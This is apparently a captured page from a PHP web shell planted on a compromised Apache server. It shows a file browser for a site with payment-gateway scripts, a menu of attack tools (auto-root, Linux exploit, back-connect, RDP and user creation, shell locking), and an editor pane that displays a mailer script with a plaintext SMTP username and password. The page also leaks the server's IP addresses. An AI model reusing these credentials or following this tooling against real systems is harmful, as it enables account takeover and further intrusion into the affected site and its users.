Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.148.130
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
bcu /
orms_stop /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxrwxr-x
admin
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxrwxr-x
default
[ DIR ]
drwxrwxr-x
docs
[ DIR ]
drwxrwxr-x
html_modules
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
tcpdf
[ DIR ]
drwxrwxr-x
uploads
[ DIR ]
drwxrwxrwx
16-01-2018_Guidelines_for_Scre...
2
MB
-rw-rw-r--
Subject and Post Details for A...
1.47
MB
-rw-rw-r--
app.php
416
B
-rw-rw-r--
cManualMailer.php
1.38
KB
-rw-rw-r--
cconfig.php
1.42
KB
-rw-rw-r--
cconfig2.php
741
B
-rw-rw-r--
extention.jpeg
84.66
KB
-rw-r--r--
home-copy.html
68.5
KB
-rw-rw-r--
home.html
10.25
KB
-rw-rw-r--
home.js
139.36
KB
-rw-rw-r--
home_21032018.html
7.17
KB
-rw-rw-r--
home_25102017.html
5.01
KB
-rw-rw-r--
home_30082017.html
61.38
KB
-rw-rw-r--
home__arun.html
63.56
KB
-rw-rw-r--
index.html
6.84
KB
-rw-rw-r--
index_16092017.html
5.55
KB
-rw-rw-r--
index_old.html
5.66
KB
-rw-rw-r--
main_page.html
5.38
KB
-rw-rw-r--
main_page_09092017_befirechang...
5.32
KB
-rw-rw-r--
payment_gate_way_responce.php
5.89
KB
-rw-rw-r--
payment_gateway.php
8.28
KB
-rw-rw-r--
payment_gateway_16022018.php
8.19
KB
-rw-rw-r--
pgResponse.php
5.3
KB
-rw-rw-r--
post.php
7.45
KB
-rw-rw-r--
registration.html
2.65
KB
-rw-rw-r--
script.js
1.02
KB
-rw-rw-r--
sendGridMail.php
1.29
KB
-rw-rw-r--
style.css
3.2
KB
-rw-rw-r--
upload_file.php
604
B
-rw-rw-r--
upload_file10.php
604
B
-rw-rw-r--
upload_file11.php
604
B
-rw-rw-r--
upload_file12.php
604
B
-rw-rw-r--
upload_file13.php
604
B
-rw-rw-r--
upload_file14.php
604
B
-rw-rw-r--
upload_file15.php
604
B
-rw-rw-r--
upload_file16.php
604
B
-rw-rw-r--
upload_file17.php
604
B
-rw-rw-r--
upload_file18.php
604
B
-rw-rw-r--
upload_file19.php
604
B
-rw-rw-r--
upload_file2.php
609
B
-rw-rw-r--
upload_file20.php
604
B
-rw-rw-r--
upload_file3.php
604
B
-rw-rw-r--
upload_file4.php
604
B
-rw-rw-r--
upload_file5.php
604
B
-rw-rw-r--
upload_file6.php
604
B
-rw-rw-r--
upload_file7.php
604
B
-rw-rw-r--
upload_file8.php
604
B
-rw-rw-r--
upload_file9.php
604
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cManualMailer.php
<?php function send_manual_mail($to,$subject,$message,$replay_to=null,$cc=null,$bcc=null) { require_once(dirname(dirname(__FILE__)).'/phpmailer/class.phpmailer.php'); $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPSecure = "ssl"; $mail->Mailer = "smtp"; $mail->Host = "smtp.zoho.com"; // SMTP server $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 465; // set the SMTP port for the GMAIL server $mail->Username = "support@logisys.org"; // SMTP account username $mail->Password = "logisys@124"; // SMTP account password */ $to_arr=explode(",",$to); foreach($to_arr as $v) { if(!empty($v)) $mail->AddAddress($v,$v); } $cc_arr=explode(",",$cc); foreach($cc_arr as $v) { if(!empty($v)) $mail->AddCC($v,$v); } $mail->AddReplyTo("support@logisys.org","support@logisys.org"); $mail->SetFrom('support@logisys.org', 'support@logisys.org'); $mail->WordWrap = 50; // set word wrap $mail->IsHTML(true); // send as HTML $mail->Subject = $subject; $mail->Body = $message; $mail->AltBody = $message; if(!$mail->Send()) { $data="Message was not sent Mailer Error: " . $mail->ErrorInfo; } else { $data='true'; } return $data; } ?>
Close